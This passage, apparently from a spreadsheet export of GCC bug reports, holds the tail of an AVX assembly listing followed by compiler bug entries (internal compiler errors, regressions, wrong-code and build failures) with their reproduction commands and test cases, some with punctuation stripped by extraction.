  vmovapd YMMWORD PTR [rbp-1136] ymm3
  vpermpd ymm3 ymm1 255
  vsqrtpd ymm2 ymm3
  vmulpd ymm3 ymm3 ymm1
  vmovapd YMMWORD PTR [rbp-1168] ymm2
  vmulpd ymm2 ymm6 YMMWORD PTR [rbp-144]
  vfmsub132pd ymm0 ymm2 YMMWORD PTR [rbp-208]
  vmovapd YMMWORD PTR [rbp-144] ymm14
  vmulpd ymm0 ymm0 YMMWORD PTR [rbp-80]
  vfmsub132pd ymm0 ymm10 YMMWORD PTR [rbp-784]
  vmulpd ymm0 ymm0 YMMWORD PTR [rbp-112]
  vfmsub132pd ymm0 ymm8 YMMWORD PTR [rbp-912]
  vmulpd ymm0 ymm0 ymm14
  vsqrtpd ymm14 ymm1
  vfmsub132pd ymm12 ymm3 ymm0
  vmulpd ymm2 ymm12 ymm14
  vmulpd ymm2 ymm2 YMMWORD PTR [rbp-1168]
  vsqrtpd ymm10 ymm2
  vpermpd ymm12 ymm2 0
  vmovapd YMMWORD PTR [rbp-208] ymm12
  vmovapd YMMWORD PTR [rbp-784] ymm10
  vsqrtpd ymm10 ymm12
  vmovapd YMMWORD PTR [rbp-912] ymm10
  vpermpd ymm10 ymm2 85
  vsqrtpd ymm8 ymm10
  vmulpd ymm10 ymm10 ymm2
  vmovapd YMMWORD PTR [rbp-1040] ymm8
  vmovapd ymm0 YMMWORD PTR [rbp-496]
  vpermpd ymm8 ymm2 170
  vfnmadd213pd ymm0 ymm7 YMMWORD PTR [rdi+128]
  vmulpd ymm3 ymm5 YMMWORD PTR [rbp-176]
  vsqrtpd ymm12 ymm8
  vmovapd YMMWORD PTR [rbp-176] ymm14
  vmulpd ymm8 ymm8 ymm2
  vmulpd ymm0 ymm0 ymm15
  vfmsub132pd ymm0 ymm13 YMMWORD PTR [rbp-656]
  vmulpd ymm0 ymm0 YMMWORD PTR [rbp-80]
  vfmsub132pd ymm0 ymm3 YMMWORD PTR [rbp-752]
  vmovapd ymm3 YMMWORD PTR [rbp-784]
  vmulpd ymm0 ymm0 YMMWORD PTR [rbp-112]
  vfmsub132pd ymm0 ymm11 YMMWORD PTR [rbp-880]
  vmovapd ymm11 YMMWORD PTR [rbp-1136]
  vmulpd ymm0 ymm0 YMMWORD PTR [rbp-144]
  vfmsub132pd ymm0 ymm9 YMMWORD PTR [rbp-1008]
  vmulpd ymm0 ymm0 ymm14
  vmulpd ymm14 ymm5 YMMWORD PTR [rbp-368]
  vfmsub132pd ymm11 ymm8 ymm0
  vmulpd ymm0 ymm4 YMMWORD PTR [rbp-304]
  vmovapd YMMWORD PTR [rbp-304] ymm14
  vmulpd ymm3 ymm3 ymm11
  vmulpd ymm3 ymm3 ymm12
  vmulpd ymm12 ymm1 YMMWORD PTR [rbp-240]
  vmovapd YMMWORD PTR [rbp-240] ymm0
  vmulpd ymm0 ymm6 YMMWORD PTR [rbp-432]
  vpermpd ymm8 ymm3 0
  vsqrtpd ymm13 ymm3
  vpermpd ymm9 ymm3 85
  vsqrtpd ymm11 ymm8
  vmovapd ymm14 ymm0
  vmovapd ymm0 YMMWORD PTR [rbp-528]
  vfnmadd213pd ymm0 ymm7 YMMWORD PTR [rdi+64]
  vmovapd YMMWORD PTR [rbp-496] ymm11
  vsqrtpd ymm11 ymm9
  vmulpd ymm9 ymm9 ymm3
  vmulpd ymm0 ymm0 ymm15
  vfmsub132pd ymm0 ymm14 YMMWORD PTR [rbp-624]
  vmovapd ymm14 YMMWORD PTR [rbp-304]
  vmulpd ymm0 ymm0 YMMWORD PTR [rbp-80]
  vfmsub132pd ymm0 ymm14 YMMWORD PTR [rbp-720]
  vmovapd ymm14 YMMWORD PTR [rbp-240]
  vmulpd ymm0 ymm0 YMMWORD PTR [rbp-112]
  vfmsub132pd ymm0 ymm14 YMMWORD PTR [rbp-848]
  vsqrtpd ymm14 ymm2
  vmulpd ymm0 ymm0 YMMWORD PTR [rbp-144]
  vfmsub132pd ymm0 ymm12 YMMWORD PTR [rbp-976]
  vmulpd ymm0 ymm0 YMMWORD PTR [rbp-176]
  vfmsub132pd ymm0 ymm10 YMMWORD PTR [rbp-1104]
  vmulpd ymm6 ymm6 YMMWORD PTR [rbp-464]
  vmulpd ymm5 ymm5 YMMWORD PTR [rbp-400]
  vmulpd ymm4 ymm4 YMMWORD PTR [rbp-336]
  vmulpd ymm1 ymm1 YMMWORD PTR [rbp-272]
  vmulpd ymm0 ymm0 ymm14
  vfmsub132pd ymm0 ymm9 YMMWORD PTR [rbp-1040]
  vmulpd ymm2 ymm2 YMMWORD PTR [rbp-208]
  vmulpd ymm3 ymm8 ymm3
  vmulpd ymm0 ymm0 ymm13
  vmulpd ymm11 ymm0 ymm11
  vpermpd ymm0 ymm11 0
  vsqrtpd ymm12 ymm11
  vmulpd ymm11 ymm0 ymm11
  vsqrtpd ymm10 ymm0
  vmovapd ymm0 YMMWORD PTR [rbp-560]
  vfnmadd213pd ymm7 ymm0 YMMWORD PTR [rdi]
  vmulpd ymm7 ymm7 ymm15
  vfmsub132pd ymm7 ymm6 YMMWORD PTR [rbp-592]
  vmulpd ymm7 ymm7 YMMWORD PTR [rbp-80]
  vfmsub132pd ymm7 ymm5 YMMWORD PTR [rbp-688]
  vmulpd ymm7 ymm7 YMMWORD PTR [rbp-112]
  vfmsub132pd ymm7 ymm4 YMMWORD PTR [rbp-816]
  vmulpd ymm0 ymm7 YMMWORD PTR [rbp-144]
  vfmsub132pd ymm0 ymm1 YMMWORD PTR [rbp-944]
  vmulpd ymm0 ymm0 YMMWORD PTR [rbp-176]
  vfmsub132pd ymm0 ymm2 YMMWORD PTR [rbp-1072]
  vmulpd ymm0 ymm0 ymm14
  vfmsub132pd ymm0 ymm3 YMMWORD PTR [rbp-912]
  vmulpd ymm0 ymm0 ymm13
  vfmsub132pd ymm0 ymm11 YMMWORD PTR [rbp-496]
  vmulpd ymm0 ymm0 ymm12
  vmulpd ymm0 ymm0 ymm10
  vzeroupper
  add rsp 1040
  pop r10
  pop rbp
  lea rsp [r10-8]
  ret
[/out]</t>
  </si>
  <si>
    <t>GCC-67143</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE (could not split insn) on aarch64-linux-gnu</t>
  </si>
  <si>
    <t>seen when building mysql trunk using trunk r226068 and gcc-5-branch r226354:
$ cat btr0btr.ii
long a c
bool b
int d
void ut_dbg_assertion_failed() __attribute__((noreturn))
long dict_index_is_spatial(int *)
void btr_block_get_func(char *)
long btr_page_get_level_low(unsigned char *)
void btr_validate_level(long p1 bool) {
  unsigned char *e
  while (p1 != btr_page_get_level_low(e)) {
    if (__builtin_expect(b 0))
      ut_dbg_assertion_failed()
    if (dict_index_is_spatial(&amp;d))
      while (c != 5535) {
        __sync_add_and_fetch(
        btr_block_get_func()
      }
  }
  for (long i i ++i)
    btr_validate_level(-i true)
}
$ g++ -Wno-write-strings -c -g -O3 btr0btr.ii 
btr0btr.ii: In function 'void btr_validate_level(long int bool)':
btr0btr.ii:21:1: error: could not split insn
 }
 ^
(insn 300 298 303 (parallel [
            (set (mem/v:DI (reg/f:DI 0 x0 [234]) [-1  S8 A64])
                (unspec_volatile:DI [
                        (plus:DI (mem/v:DI (reg/f:DI 0 x0 [234]) [-1  S8 A64])
                            (const_int 536870912 [0x20000000]))
                        (const_int 5 [0x5])
                    ] UNSPECV_ATOMIC_OP))
            (clobber (reg:CC 66 cc))
            (clobber (reg:DI 1 x1 [490]))
            (clobber (reg:SI 2 x2 [491]))
        ]) btr0btr.ii:15 2451 {atomic_adddi}
     (expr_list:REG_DEAD (reg/f:DI 0 x0 [234])
        (expr_list:REG_UNUSED (reg:CC 66 cc)
            (expr_list:REG_UNUSED (reg:SI 2 x2 [491])
                (expr_list:REG_UNUSED (reg:DI 1 x1 [490])
                    (nil))))))
btr0btr.ii:21:1: internal compiler error: in final_scan_insn at final.c:3020
0x9eadbf _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../src/gcc/rtl-error.c:110
0x80dfc7 final_scan_insn(rtx_insn* _IO_FILE* int int int*)
        ../../src/gcc/final.c:3020
0x80e287 final(rtx_insn* _IO_FILE* int)
        ../../src/gcc/final.c:2089
0x80e78f rest_of_handle_final
        ../../src/gcc/final.c:4488
0x80e78f execute
        ../../src/gcc/final.c:4563
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.</t>
  </si>
  <si>
    <t>mwahab</t>
  </si>
  <si>
    <t>GCC-283</t>
  </si>
  <si>
    <t>Getting internal compiler error</t>
  </si>
  <si>
    <t>When compiling SafeTP http://www.cs.berkeley.edu/~smcpeak/SafeTP/
Down the line I get:
crypto/iterhash.cpp:97: Internal compiler error.
crypto/iterhash.cpp:97: Please submit a full bug report.
crypto/iterhash.cpp:97: See  for instructions.
Release:
unknown
Environment:
Solaris 2.7 Sparc
gcc 2.95.2
How-To-Repeat:
Download GNU Multi-Precision Library (from SafeTP page) version 2.0.2 compile.  Download SafeTP source.  setenv PLATFORM to SunOS.SPARC</t>
  </si>
  <si>
    <t>alec</t>
  </si>
  <si>
    <t>GCC-4203</t>
  </si>
  <si>
    <t>empty base class optimization zeroes first byte of other base class when using multiple inheritance</t>
  </si>
  <si>
    <t>When using multiple inheritance and one base class have some
data member the other is an empty class the later inherits
from another empty class none of the empty class has
neither declared nor defined constructors and the non empty
base class is enumerated first in the declaration of
superclasses the non empty base class looses the first
byte of information.
--------------------------------------------------------
g++ -oa -v save-temps a.c
--------------------------------------------------------
Reading specs from /usr/local/gcc-3.0/lib/gcc-lib/i586-pc-linux-gnu/3.0/specs
Configured with: ../gcc-3.0/configure --prefix=/usr/local/gcc-3.0
Thread model: single
gcc version 3.0
 /usr/local/gcc-3.0/lib/gcc-lib/i586-pc-linux-gnu/3.0/cpp0 -lang-c++ -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i586__ -D__tune_pentium__ a.c a.ii
GNU CPP version 3.0 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/gcc-3.0/i586-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/gcc-3.0/include/g++-v3
 /usr/local/gcc-3.0/include/g++-v3/i586-pc-linux-gnu
 /usr/local/gcc-3.0/include/g++-v3/backward
 /usr/local/include
 /usr/local/gcc-3.0/lib/gcc-lib/i586-pc-linux-gnu/3.0/include
 /usr/include
End of search list.
 /usr/local/gcc-3.0/lib/gcc-lib/i586-pc-linux-gnu/3.0/cc1plus -fpreprocessed a.ii -quiet -dumpbase a.c -version -o a.s
GNU CPP version 3.0 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0 (i586-pc-linux-gnu)
	compiled by GNU C version 3.0.
 as --traditional-format -V -Qy -o a.o a.s
GNU assembler version 2.9.1 (i386-redhat-linux) using BFD version 2.9.1.0.23
 /usr/local/gcc-3.0/lib/gcc-lib/i586-pc-linux-gnu/3.0/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -oa /usr/lib/crt1.o /usr/lib/crti.o /usr/local/gcc-3.0/lib/gcc-lib/i586-pc-linux-gnu/3.0/crtbegin.o -L/usr/local/gcc-3.0/lib/gcc-lib/i586-pc-linux-gnu/3.0 -L/usr/local/gcc-3.0/lib/gcc-lib/i586-pc-linux-gnu/3.0/../../.. a.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/gcc-3.0/lib/gcc-lib/i586-pc-linux-gnu/3.0/crtend.o /usr/lib/crtn.o
Release:
gcc version 3.0
Environment:
linux kerner 2.2.5.15 I586
How-To-Repeat:
# 1 a.c
# 1 /usr/local/gcc-3.0/include/g++-v3/cassert 1 3
# 31 /usr/local/gcc-3.0/include/g++-v3/cassert 3
# 1 /usr/local/gcc-3.0/include/g++-v3/bits/std_cassert.h 1 3
# 37 /usr/local/gcc-3.0/include/g++-v3/bits/std_cassert.h 3
# 1 /usr/include/assert.h 1 3
# 35 /usr/include/assert.h 3
# 1 /usr/include/features.h 1 3
# 249 /usr/include/features.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 250 /usr/include/features.h 2 3
# 277 /usr/include/features.h 3
# 1 /usr/include/gnu/stubs.h 1 3
# 278 /usr/include/features.h 2 3
# 36 /usr/include/assert.h 2 3
# 58 /usr/include/assert.h 3
extern C {
extern void __assert_fail (__const char *__assertion __const char *__file unsigned int __line __const char *__function)
     __attribute__ ((__noreturn__))
extern void __assert_perror_fail (int __errnum __const char *__file unsigned int __line __const char *__function)
     __attribute__ ((__noreturn__))
}
# 38 /usr/local/gcc-3.0/include/g++-v3/bits/std_cassert.h 2 3
# 32 /usr/local/gcc-3.0/include/g++-v3/cassert 2 3
# 2 a.c 2
class EmptyBase0 {}
class EmptyBase1 : public EmptyBase0 {}
class Base1
{
public:
        unsigned int t_
        Base1(unsigned int t) : t_(t) {}
}
class PEPE : public Base1 public EmptyBase1
{
public:
        PEPE(unsigned int t) : Base1(t) EmptyBase1(EmptyBase1()) {}
}
int main()
{
        PEPE pepe(0xff)
        ((void) ((pepe.t_ == 255) ? 0 : (__assert_fail (pepe.t_ == 255 a.c 22 ((__const char *) 0)) 0)))
}</t>
  </si>
  <si>
    <t>franzoy</t>
  </si>
  <si>
    <t>GCC-29365</t>
  </si>
  <si>
    <t>Unnecessary anonymous namespace warnings</t>
  </si>
  <si>
    <t>How to reproduce: g++ -c foo.C
Compiling the attached code using g++-4.2 generates the warning
foo.C:11: warning: 'foo::bar' has a base '::gazonk' whose type uses the anonymous namespace
I fail to see why this construct should be warned about</t>
  </si>
  <si>
    <t>GCC-56420</t>
  </si>
  <si>
    <t>[4.8 Regression] Arithmetic error in computation with compile time unsigned __int128 constant</t>
  </si>
  <si>
    <t>With GCC 4.8 (x86-64 snapshot 20130203 on Linux) the following simple test case demonstrates an arithmetic bug for code involving a static unsigned __int128 constant. This seems to be a regression from GCC 4.7.
#include 
typedef unsigned __int128 uint128_t
static const uint128_t c = ((uint128_t)-1ULL &lt;&lt; 64) + (1ULL &lt;&lt; 63)
int main() {
    // use volatile to prevent optimizer from optimizing the test
    volatile uint128_t a = (uint128_t)1 &lt;&lt; 127
    volatile uint128_t b = 1
    volatile uint128_t cc = c
    uint128_t result1 = a - b*c
    uint128_t result2 = a - b*cc
    if (result1 != result2) {
        std::cout &lt;&lt; Error: results differ.\n
        return 1
    } else {
        std::cout &lt;&lt; No error.\n
        return 0
    }
}</t>
  </si>
  <si>
    <t>st</t>
  </si>
  <si>
    <t>GCC-2182</t>
  </si>
  <si>
    <t>ICE in set_mem_attributes_minus_bitpos</t>
  </si>
  <si>
    <t>Gcc produces an internal compiler error using the provided preprocessed testcase.
I've tested the latest head of the development trunk as well as the gcc 3 branch.
Release:
2.97 20010201 (experimental)
Environment:
System: Linux fishpond 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /src/sourceware/gcc/gcc/configure -v --prefix=/usr/sourceware
How-To-Repeat:
Script started on Mon Mar  5 10:01:52 2001
$ ./cc1plus -quiet bug.ii
$ ./cc1plus -quiet -fpic bug.ii
MPEGyuv2rgb.cpp: In function `void yuv2rgb(unsigned char* const unsigned 
   char* const unsigned char* const unsigned char* int int int)':
MPEGyuv2rgb.cpp:250: Internal compiler error in instantiate_virtual_regs_1 at 
   function.c:3911
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
$ cat bug.ii</t>
  </si>
  <si>
    <t>GCC-35805</t>
  </si>
  <si>
    <t>[ira] error in start_allocno_priorities at ira-color.c:1806</t>
  </si>
  <si>
    <t>Hi
gcc  930523-1.c -c -fira -O1 -m32
fails with
930523-1.c: In function 'f':
930523-1.c:54: internal compiler error: in start_allocno_priorities at ira-color.c:1806
Please submit a full bug report
rev: 133765</t>
  </si>
  <si>
    <t>GCC-32113</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 regression] ICE with invalid template parameter</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.1.0:
=====================================================
template struct A
template void foo (A&lt;
template void foo &gt; (A)
=====================================================
bug.cc:3: error: '#'unbound_class_template' not supported by dump_decl#' is not a template
bug.cc:5: internal compiler error: in lookup_member at cp/search.c:1203
Please submit a full bug report [etc.]
Btw the hosed diagnostic in the first line of the error message is tracked
in PR 32112.</t>
  </si>
  <si>
    <t>GCC-44851</t>
  </si>
  <si>
    <t>questionable '' may be used uninitialized warning and code failure</t>
  </si>
  <si>
    <t>The attached simple test case crashes when compiled with g++ but not with gcc.
Version 4.4.3 of g++ emits the '' may be used uninitialized warning.
The program works fine when one unreachable line is removed from the program.
It seems that the compiler generates incorrect code when the unreachable line is present.  The program also works if optimization is enabled presumably because it optimizes away the unreachable line.
g++ -Wall -g -o gccmultidimarray gccmultidimarray.c</t>
  </si>
  <si>
    <t>GCC-83658</t>
  </si>
  <si>
    <t>any::emplace deletes invalid memory when an overloaded operator new() throws</t>
  </si>
  <si>
    <t>Note the following Wandbox: https://wandbox.org/permlink/1emVGP0a09lmd4g2 -- the std::any is still empty after new() throws and so the destructor should be a no-op.  Instead it calls delete().
__do_emplace sets the manager pointer before attempting to create a new object.  When new() throws after calling reset() _M_ptr doesn't point to valid memory.  When later the destructor is called on the any the manager pointer still is non-null so the destructor via reset() will trigger the call to _S_manage(_Op_destroy ...) calling delete on the invalid _M_ptr.  
I believe setting the manager pointer after calling _S_create() will fix the issue since the manager pointer will still be null after _S_create_ propagates the exception.</t>
  </si>
  <si>
    <t>cohenjon</t>
  </si>
  <si>
    <t>GCC-33290</t>
  </si>
  <si>
    <t>[4.3 Regression] gcc.c-torture/execute/930921-1.c fails at -O1 and above now</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #33283 +++
[18:22]   /home/apinski/src/local/gcc/gcc/testsuite/gcc.c-torture/execute/930921-1.c:5: error: could not split insn^M
[18:22]  new failure
[18:23]  on ppc-linux-gnu
[18:23]  between 127935 and 128000
[18:32]  I guess it could be due to my predicate change
[18:33]  this was after that
[18:33]  okay phew
[18:33]  paired support was inbetween that though
[18:33]  sigh
[18:34]  Revital said that she regression tested
[18:34]  but also Sandra's regclass changes
[18:34]  and some optabs changes
[18:34]  so it could be either of those three
And then from PR 33277 #3:
Fromp http://gcc.gnu.org/ml/gcc-testresults/ looking at the results from
regress it can be narrowed between 127961 (working) and 127997 (non
working).  Note that the last change of final.c is 127941 (outside the range). 
From an uneducated guess I'l say 127989 but I may be completely wrong.
And from #4:
From looking closer to the changes the scheduler changes is not
likely because this happens at -O1 :)  I am more thinking it was:
2007-08-31  Richard Sandiford  
Which changed optabs which is part of the expansion.  The IV change
could not have cause this issue as there is no loop in that function
so the last change would be the optabs change.
Note I am going to start cloning this bug until all the offtopic stuff stops being added.</t>
  </si>
  <si>
    <t>GCC-19140</t>
  </si>
  <si>
    <t>ACATS c37402a segfaults at runtime</t>
  </si>
  <si>
    <t>It started failing between
LAST_UPDATED: Sat Dec 18 12:22:14 UTC 2004
LAST_UPDATED: Thu Dec 23 10:53:32 UTC 2004
It works on x86.
.. C37402A ACATS 2.5 04-12-23 13:06:28
---- C37402A CHECK THAT WHEN A FORMAL PARAMETER OF A SUBPROGRAM ENTRY 
                OR GENERIC UNIT HAS AN UNCONSTRAINED TYPE WITH
                DISCRIMINANTS THAT HAVE DEFAULTS 'CONSTRAINED IS 'TRUE'
                WHEN APPLIED TO FORMAL PARAMETERS OF MODE IN AND HAS THE
                VALUE OF THE ACTUAL PARAMETER FOR THE OTHER MODES.
/home/guerby/work/gcc/version-head/gcc/testsuite/ada/acats/run_all.sh: line 15:
20344 Segmentation fault      $*</t>
  </si>
  <si>
    <t>GCC-41771</t>
  </si>
  <si>
    <t>Bootstrap with Sun Studio 12.1 fails</t>
  </si>
  <si>
    <t>I suppose mainline is affected as well but I've first got a report about this and
tested on GCC 4.4.2.
Bootstrapping GCC 4.4.2 on Solaris 11/SPARC and Solaris 10/x86 with Sun Studio
12.1 fails in stage 1 linking xgcc:
Undefined			first referenced
 symbol  			    in file
__gmpn_perfect_square_p             gcc.o
__gmpz_tdiv_q                       gcc.o
__gmpq_set                          gcc.o
__gmpz_set                          gcc.o
__gmpn_add_n                        gcc.o
__gmpn_sub_n                        gcc.o
__gmpn_popcount                     gcc.o
ld: fatal: Symbol referencing errors. No output written to xgcc
Re-running the gcc.o build with -E reveals that e.g. the reference to __gmpn_perfect_square_p is from __gmpz_perfect_square_p which is *defined*
as extern in the header although __GMP_EXTERN_INLINE is correctly defined
in gmp.h for __SUNPRO_C &gt;= 0x560 (this is 0x5100 for Studio 12.1).  It turned
out that ansidecl.h was the culprit: the current file assumes that inline
is a keyword
#if __STDC_VERSION__ &gt; 199901L
which is wrong: C99 defines __STDC_VERSION__ as 199901L so the test should be
for &gt;= instead as in several other places in GCC.  But even this doesn't help:
Sun cc only defines it in C99 mode (quelle surprise :-) but trying to bootstrap
GCC with cc -xc99 or c99 breaks in other places (headers require e.g.
-D_XOPEN_SOURCE=0x600 with c99) so I chose to use another test:
#if (__STDC_VERSION__ &gt;= 199901L) || (defined(__SUNPRO_C) &amp;&amp; defined(__C99FEATURES__))
since the compiler supports inline even without C99 mode.  This got me somewhat
further but I ran into a couple of compilation failures in the gcc directory:
/vol/src/gnu/gcc/gcc-4.4.2/gcc/bitmap.c line 298: reference to static identifier bitmap_elt_clear_from in extern inline function
/vol/src/gnu/gcc/gcc-4.4.2/gcc/dominance.c line 718: reference to static identifier dom_convert_dir_to_idx in extern inline function
/vol/src/gnu/gcc/gcc-4.4.2/gcc/gimple.c line 1471: reference to static identifier walk_gimple_asm in extern inline function
I cannot say for certain if the errors are correct but the do make sense to me.
Chaning the three functions to extern allowed to compilation to continue but
again linking xgcc failed with the same set of undefined functions.  Even with
extern inline cc emits a definition of several functions in gcc.o which still
reference functions only defined in libgmp.
I'm not sure what is the best way to handle this: one could link xgcc and cpp
with GMPLIBS or avoid including gmp.h in headers used by gcc.c.</t>
  </si>
  <si>
    <t>GCC-45360</t>
  </si>
  <si>
    <t>arm: -mhard-float != -mfloat-abi=hard during linking</t>
  </si>
  <si>
    <t>The GCC manual (ARM Options) states that -mhard-float is equivalent to -mfloat-abi=hard.  However that does seem to be the case when it comes to linking:
$ arm-elf-gcc -mfloat-abi=hard -print-file-name=libc.a
/usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/lib/fpu/libc.a
$ arm-elf-gcc -mhard-float -print-file-name=libc.a
/usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/lib/libc.a
$ arm-elf-gcc -mfloat-abi=hard -v -o hello hello.c
...
COLLECT_GCC_OPTIONS='-mfloat-abi=hard' '-v' '-o' 'hello'
 /usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/bin/as.exe -mfloat-abi=hard -o /tmp/ccBX7XJa.o /tmp/ccm5rZK3.s
COMPILER_PATH=/usr/lib/gcc/arm-elf/4.5.1/:/usr/lib/gcc/arm-elf/4.5.1/:/usr/lib/gcc/arm-elf/:/usr/lib/gcc/arm-elf/4.5.1/:/usr/lib/gcc/arm-elf/:/usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/bin/
LIBRARY_PATH=/usr/lib/gcc/arm-elf/4.5.1/fpu/:/usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/lib/fpu/:/usr/lib/gcc/arm-elf/4.5.1/:/usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/lib/:/usr/arm-elf/sys-root/usr/lib/
COLLECT_GCC_OPTIONS='-mfloat-abi=hard' '-v' '-o' 'hello'
 /usr/lib/gcc/arm-elf/4.5.1/collect2.exe --sysroot=/usr/arm-elf/sys-root -X -o hello /usr/lib/gcc/arm-elf/4.5.1/fpu/crti.o /usr/lib/gcc/arm-elf/4.5.1/fpu/crtbegin.o /usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/lib/fpu/crt0.o -L/usr/lib/gcc/arm-elf/4.5.1/fpu -L/usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/lib/fpu -L/usr/lib/gcc/arm-elf/4.5.1 -L/usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/lib -L/usr/arm-elf/sys-root/usr/lib /tmp/cc4pxySH.o --start-group -lgcc -lc --end-group /usr/lib/gcc/arm-elf/4.5.1/fpu/crtend.o /usr/lib/gcc/arm-elf/4.5.1/fpu/crtn.o
$ arm-elf-gcc -mhard-float -v  -o hello hello.c
...
COLLECT_GCC_OPTIONS='-mhard-float' '-v' '-o' 'hello'
 /usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/bin/as.exe -mfloat-abi=hard -o /tmp/ccQgFiBi.o /tmp/ccv7qPvG.s
COMPILER_PATH=/usr/lib/gcc/arm-elf/4.5.1/:/usr/lib/gcc/arm-elf/4.5.1/:/usr/lib/gcc/arm-elf/:/usr/lib/gcc/arm-elf/4.5.1/:/usr/lib/gcc/arm-elf/:/usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/bin/
LIBRARY_PATH=/usr/lib/gcc/arm-elf/4.5.1/:/usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/lib/:/usr/arm-elf/sys-root/usr/lib/
COLLECT_GCC_OPTIONS='-mhard-float' '-v' '-o' 'hello'
 /usr/lib/gcc/arm-elf/4.5.1/collect2.exe --sysroot=/usr/arm-elf/sys-root -X -o hello /usr/lib/gcc/arm-elf/4.5.1/crti.o /usr/lib/gcc/arm-elf/4.5.1/crtbegin.o /usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/lib/crt0.o -L/usr/lib/gcc/arm-elf/4.5.1 -L/usr/lib/gcc/arm-elf/4.5.1/../../../../arm-elf/lib -L/usr/arm-elf/sys-root/usr/lib /tmp/ccQgFiBi.o --start-group -lgcc -lc --end-group /usr/lib/gcc/arm-elf/4.5.1/crtend.o /usr/lib/gcc/arm-elf/4.5.1/crtn.o
Note that -mhard-float is translated to -mfloat-abi=hard when passed to the assembler but the fpu multilibs aren't added to LIBRARY_PATH resulting in linking with the soft-float crt*.o and libraries.</t>
  </si>
  <si>
    <t>GCC-16239</t>
  </si>
  <si>
    <t>GCC 3.4.0 ICE on ppc64 (mozilla 1.7 compile  -O1 -fno-exceptions issue)</t>
  </si>
  <si>
    <t>ICE on compile.  Seems to be an issue with -O1 and -fno-exceptions
on this particular mozilla file (at least that's what I've narrowed
it down to).  I've attached the pre-processed g++ -E output.
It's using Gentoo's GCC 3.4.0-r6 ebuild Tom Gall @ IBM told me to
post so blame him. :)
Below are compile lines and info:
*****************************
Full output from bad compile:
*****************************
g++ -o nsXULContentBuilder.o -c -DOSTYPE=\Linux2.6\ -DOSARCH=\Linux\
-D_IMPL_NS_LAYOUT -I./../../../base/src -I./../../content/src 
-I../../../../dist/include/xpcom -I../../../../dist/include/string
-I../../../../dist/include/js -I../../../../dist/include/xpconnect
-I../../../../dist/include/caps -I../../../../dist/include/gfx
-I../../../../dist/include/htmlparser -I../../../../dist/include/layout
-I../../../../dist/include/content -I../../../../dist/include/widget
-I../../../../dist/include/dom -I../../../../dist/include/rdf
-I../../../../dist/include/necko -I../../../../dist/include/locale
-I../../../../dist/include/unicharutil -I../../../../dist/include/xul
-I../../../../dist/include/xuldoc -I../../../../dist/include/webshell
-I../../../../dist/include/xultmpl -I../../../../dist/include
-I/var/tmp/portage/mozilla-1.7/work/mozilla/dist/include/nspr    
-I/usr/X11R6/include   -fPIC  -I/usr/X11R6/include -fno-rtti -fno-exceptions
-Wall -Wconversion -Wpointer-arith -Wcast-align -Woverloaded-virtual -Wsynth
-Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wno-long-long -mminimal-toc
-fno-strict-aliasing -Wno-deprecated -fshort-wchar -pthread -pipe  -DNDEBUG
-DTRIMMED -ffunction-sections -O1 -g  -I/usr/X11R6/include -DMOZILLA_CLIENT
-include ../../../../mozilla-config.h -Wp-MD.deps/nsXULContentBuilder.pp
nsXULContentBuilder.cpp
In file included from ./../../content/src/nsXULElement.h:64
                 from nsXULContentBuilder.cpp:70:
../../../../dist/include/dom/nsIDOMXULSelectCntrlEl.h:33: warning: `virtual
nsresult
nsIDOMXULSelectControlElement::GetSelectedItem(nsIDOMXULSelectControlItemElement**)'
was hidden
../../../../dist/include/dom/nsIDOMXULMultSelectCntrlEl.h:69: warning:   by
`virtual nsresult nsIDOMXULMultiSelectControlElement::GetSelectedItem(PRInt32
nsIDOMXULSelectControlItemElement**)'
nsXULTemplateBuilder.h:94: warning: `virtual nsresult
nsXULTemplateBuilder::Init(nsIContent*)' was hidden
nsXULContentBuilder.cpp:146: warning:   by `nsresult nsXULContentBuilder::Init()'
nsXULContentBuilder.cpp: In member function `nsresult
nsXULContentBuilder::BuildContentFromTemplate(nsIContent* nsIContent*
nsIContent* PRBool nsIRDFResource* PRBool nsTemplateMatch* nsIContent**
PRInt32*)':
nsXULContentBuilder.cpp:85: error: insn does not satisfy its constraints:
(insn 6646 6645 6534 78 (set (reg/v/f:DI 63 31 [orig:978 data ] [978])
        (plus:DI (reg/v/f:DI 63 31 [orig:978 data ] [978])
            (const_int 232 [0xe8]))) 233 {*adddi3_internal1} (nil)
